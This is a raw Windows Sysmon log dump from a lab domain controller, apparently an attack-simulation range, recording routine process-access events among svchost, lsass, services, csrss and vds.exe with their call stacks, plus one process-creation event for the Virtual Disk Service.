09:20:17.859{5EBD8912-8CBD-6151-0A00-00000000FD01}624312C:\Windows\system32\services.exe{5EBD8912-8CD1-6151-3C00-00000000FD01}3600C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053444Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053443Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053442Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053441Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053440Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053439Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053438Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.828{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053437Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.828{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053436Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.828{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053435Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.828{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053434Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.828{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053433Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.828{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053432Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.828{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053431Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.828{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053430Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.828{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053429Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.812{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD1-6151-3C00-00000000FD01}3600C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053428Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.812{5EBD8912-8CBD-6151-0A00-00000000FD01}624716C:\Windows\system32\services.exe{5EBD8912-8CD1-6151-3C00-00000000FD01}3600C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053427Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.809{5EBD8912-8CD1-6151-3C00-00000000FD01}3600C:\Windows\System32\vds.exe10.0.14393.4169 (rs1_release.210107-1130)Virtual Disk ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationvds.exeC:\Windows\System32\vds.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F43B67F8FB870A731294662603690C2F,SHA256=9707255C9778F9A8135BAA4F1A16FAC9EBF2991FD6AF937B232D5FA52D14AC33,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001053426Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.796{5EBD8912-8CBD-6151-0B00-00000000FD01}6402908C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053425Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.796{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053424Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.796{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053423Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.796{5EBD8912-8CBD-6151-0B00-00000000FD01}6402908C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053422Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.796{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053421Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.796{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 